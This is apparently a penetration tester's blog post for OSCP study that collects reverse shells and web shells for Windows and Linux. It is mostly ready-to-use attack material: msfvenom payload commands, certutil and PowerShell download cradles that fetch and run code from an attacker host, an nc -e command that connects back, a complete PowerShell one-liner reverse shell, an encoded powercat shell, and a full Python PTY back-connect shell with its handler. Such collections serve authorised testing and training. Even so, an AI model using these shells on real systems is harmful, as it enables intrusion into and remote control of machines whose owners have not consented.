Windows and Linux shells repository

Yara AlHumaidan (0xy37)
4 min read · May 23, 2021

While doing the OSCP I spent a lot of time looking for suitable reverse shells and web shells; I needed a repository to keep all the shells I can use in one place.

Before we start, pentestmonkey maintains an excellent collection of shells; make sure to check it out.

http://pentestmonkey.net/tools/web-shells/perl-reverse-shell

WEB SHELLS

This GitHub project is an excellent source of web shells, and the good thing about it is that it is continuously updated.

  • IIS (ASP/ASPX) payloads (replace LHOST with your listener IP):
msfvenom -p windows/shell_reverse_tcp LHOST=0.0.0.0 LPORT=443 -f aspx > shell.aspx
msfvenom -p windows/shell_reverse_tcp LHOST=0.0.0.0 LPORT=443 -f asp > shell.asp
  • Using certutil.exe (already installed on Windows)

This method is helpful when you already have command execution through a web shell and want to upgrade it to a proper interactive shell: use certutil to fetch nc.exe from your web server, then launch it to connect back. The cmd= prefix is the web shell's command parameter, so URL-encode the value if you send it in a GET request:

cmd=certutil.exe -urlcache -f http://192.168.49.142/nc.exe C:\Users\apache\Documents\nc.exe
cmd=C:\Users\apache\Documents\nc.exe -e cmd.exe 192.168.49.142 443
  • PHP web shell

This is a very stable PHP reverse shell from pentestmonkey; edit the $ip and $port variables at the top of the file to point at your listener before uploading it.

http://pentestmonkey.net/tools/web-shells/php-reverse-shell

Windows payloads

  • msfvenom payloads (Meterpreter and plain shell)

Staged payloads have a slash between stage and stager (meterpreter/reverse_tcp) and need Metasploit's multi/handler to deliver the second stage; stageless payloads use an underscore (meterpreter_reverse_tcp) and carry everything in the binary, so a stageless shell_reverse_tcp works with a plain nc listener. windows/exec is a stageless single that just runs a command on the target.

-- staged [x86] --
windows/meterpreter/reverse_http
windows/meterpreter/reverse_tcp
windows/meterpreter/bind_tcp
windows/shell/bind_tcp
windows/shell/reverse_tcp
-- non-staged [x86] --
windows/exec
windows/powershell_reverse_tcp
windows/powershell_bind_tcp
windows/meterpreter_reverse_tcp
windows/meterpreter_reverse_http
windows/meterpreter_bind_tcp
windows/shell_bind_tcp
windows/shell_reverse_tcp
-- staged [x64] --
windows/x64/meterpreter/bind_tcp
windows/x64/meterpreter/reverse_http
windows/x64/meterpreter/reverse_tcp
windows/x64/shell/bind_tcp
windows/x64/shell/reverse_tcp
-- non-staged [x64] --
windows/x64/exec
windows/x64/meterpreter_bind_tcp
windows/x64/meterpreter_reverse_http
windows/x64/meterpreter_reverse_tcp
windows/x64/shell_reverse_tcp
windows/x64/shell_bind_tcp
  • PowerShell payloads
powershell -c iex(new-object net.webclient).downloadstring('http://0.0.0.0/Invoke-PowerShellTcp.ps1')

This download cradle fetches a script from your web server and runs it in memory, so you can launch anything on the target this way. Note that Invoke-PowerShellTcp.ps1 (from Nishang) only defines a function: append a call such as Invoke-PowerShellTcp -Reverse -IPAddress <your IP> -Port 443 to the end of the file before hosting it, or nothing will connect back. Some scripts you can run:

Invoke-PowerShellTcp.ps1

Netcat

PowerShell one-liner reverse shell (pure PowerShell, no extra binary needed; replace 0.0.0.0 and 443 with your listener):
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('0.0.0.0',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i =$stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
  • Encoded shell (avoids quoting problems and trips fewer naive string filters; Base64 alone is not real AV evasion)
powercat -c 10.11.0.4 -p 443 -e cmd.exe -ge > encodedreverseshell.ps1
powershell.exe -E <the content of encodedreverseshell.ps1>

Load powercat first (. .\powercat.ps1) so the powercat function is available; -ge emits a Base64 payload meant for powershell -E, not for dot-sourcing.
  • mkpsrevshell

This is a simple but very effective reverse shell; I used it plenty of times on Windows machines.

mkpsrevshell.py script

To use the script, download it and run it with your listener IP and port:

python3 mkpsrevshell.py 10.10.10.10 443
The output of the mkpsrevshell script

The output is a Base64-encoded PowerShell reverse shell that can be pasted straight into a shell on the (Windows) target. Copy the whole output and paste it there:

Running the output on the Windows target

Start a netcat listener on your Kali box first (nc -lvnp 443); running the output on the target should then give you a reverse shell.

reverse shell

Linux payloads

  • msfvenom payloads (Meterpreter and plain shell)
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<your IP> LPORT=<your port> -f elf > shell.elf

The listener address is LHOST (your machine), not RHOST; copy shell.elf to the target and chmod +x it before running it.

[x86 payloads]
linux/x86/meterpreter/bind_tcp
linux/x86/meterpreter/reverse_tcp
linux/x86/meterpreter/reverse_http
linux/x86/meterpreter_reverse_http
linux/x86/meterpreter_reverse_tcp
linux/x86/meterpreter_bind_tcp
linux/x86/shell_reverse_tcp
linux/x86/shell_bind_tcp
linux/x86/shell/reverse_tcp
linux/x86/shell/bind_tcp
[x64 payloads]
linux/x64/meterpreter/bind_tcp
linux/x64/meterpreter/reverse_tcp
linux/x64/meterpreter/reverse_http
linux/x64/meterpreter_reverse_http
linux/x64/meterpreter_reverse_tcp
linux/x64/meterpreter_bind_tcp
linux/x64/shell_reverse_tcp
linux/x64/shell_bind_tcp
linux/x64/shell/reverse_tcp
linux/x64/shell/bind_tcp

Python PTY shells (Linux only)

  • On the target (Linux) machine:

Download the tcp_pty_backconnect.py script to the target, edit the host and port in it to point at your Kali box, then run it:

Editing the script with the Kali IP and port

python tcp_pty_backconnect.py
  • On the attacking machine (Kali):

Download the tcp_pty_shell_handler.py script and run it with the syntax below.

Note: start the handler first so that it is already listening when tcp_pty_backconnect.py connects back from the target; as with any reverse shell, an outbound connection to a port nobody is listening on just fails.

python tcp_pty_shell_handler.py -b 192.168.201.37:80
Getting a reverse shell

There are other scripts you can try in the same repository, such as UDP and bind shells.
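
The reason these two scripts are worth the extra steps over a plain nc -e shell is the pseudo-terminal: the shell on the target runs inside a real PTY, so you get job control, tab completion, and programs like su, sudo and vi that refuse to work without a tty. The following is an added example that re-implements a minimal version of the back-connect/handler pair to show how that works; it is not the repository's own code, and the addresses are placeholders. Run it with -c on the target and -b on Kali.

```python
#!/usr/bin/env python3
"""Minimal PTY back-connect shell and matching handler. Added example."""
import os
import pty
import select
import socket
import sys
import termios
import tty


def parse_hostport(arg: str) -> tuple:
    """'192.168.201.37:80' -> ('192.168.201.37', 80)"""
    host, _, port = arg.rpartition(":")
    return host, int(port)


def relay(sock: socket.socket, rfd: int, wfd: int) -> None:
    """Copy bytes between a socket and a read/write fd pair until either side closes."""
    sfd = sock.fileno()
    while True:
        readable, _, _ = select.select([sfd, rfd], [], [])
        if sfd in readable:
            data = sock.recv(4096)
            if not data:
                return
            os.write(wfd, data)
        if rfd in readable:
            try:
                data = os.read(rfd, 4096)
            except OSError:            # EIO: the shell behind the PTY has exited
                return
            if not data:
                return
            sock.sendall(data)


def backconnect(host: str, port: int, shell: str = "/bin/sh") -> None:
    """Target side: connect out, fork a PTY-backed shell, relay it over the socket."""
    sock = socket.create_connection((host, port))
    pid, master = pty.fork()           # child gets the slave PTY as its controlling tty
    if pid == 0:
        os.environ["TERM"] = "xterm"
        try:
            os.execv(shell, [shell, "-i"])
        finally:
            os._exit(127)
    try:
        relay(sock, master, master)
    finally:
        sock.close()
        os.close(master)               # closing the master hangs up the shell if still alive
        os.waitpid(pid, 0)


def handler(bind_host: str, bind_port: int) -> None:
    """Attacker side: listen, then wire the remote PTY to our own terminal."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((bind_host, bind_port))
    srv.listen(1)
    print(f"[*] listening on {bind_host}:{bind_port}", file=sys.stderr)
    conn, peer = srv.accept()
    print(f"[+] connection from {peer[0]}:{peer[1]}", file=sys.stderr)
    stdin = sys.stdin.fileno()
    old = termios.tcgetattr(stdin)
    tty.setraw(stdin)                  # raw mode: Ctrl-C, arrows etc. go to the remote shell
    try:
        relay(conn, stdin, sys.stdout.fileno())
    finally:
        termios.tcsetattr(stdin, termios.TCSADRAIN, old)
        conn.close()


def loopback_session(commands: bytes, timeout: float = 10.0) -> bytes:
    """Self-test: drive a full back-connect session over 127.0.0.1 without a
    terminal and return everything the remote PTY sent back."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    srv.settimeout(timeout)
    port = srv.getsockname()[1]
    pid = os.fork()
    if pid == 0:                       # child plays the target
        srv.close()
        backconnect("127.0.0.1", port)
        os._exit(0)
    conn, _ = srv.accept()
    srv.close()
    conn.settimeout(timeout)
    conn.sendall(commands)
    out = b""
    try:
        while chunk := conn.recv(4096):
            out += chunk
    except socket.timeout:
        pass
    conn.close()
    os.waitpid(pid, 0)
    return out


if __name__ == "__main__":
    if len(sys.argv) == 3 and sys.argv[1] == "-b":
        handler(*parse_hostport(sys.argv[2]))
    elif len(sys.argv) == 3 and sys.argv[1] == "-c":
        backconnect(*parse_hostport(sys.argv[2]))
    else:
        sys.exit(f"usage: {sys.argv[0]} -b <listen ip:port> | -c <attacker ip:port>")
```

Because the handler puts your terminal in raw mode, Ctrl-C is forwarded to the remote shell instead of killing the handler; to leave, type exit in the remote shell, which closes the PTY and makes both sides return.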

Finally, this repository is not meant to be complete; feel free to comment with your favorite reverse shell, and keep looking for new and awesome $h333llss!

Yara AlHumaidan (0xy37), Penetration Testing Consultant | OSCP | OSWP | eWAPTXv2 | CRTP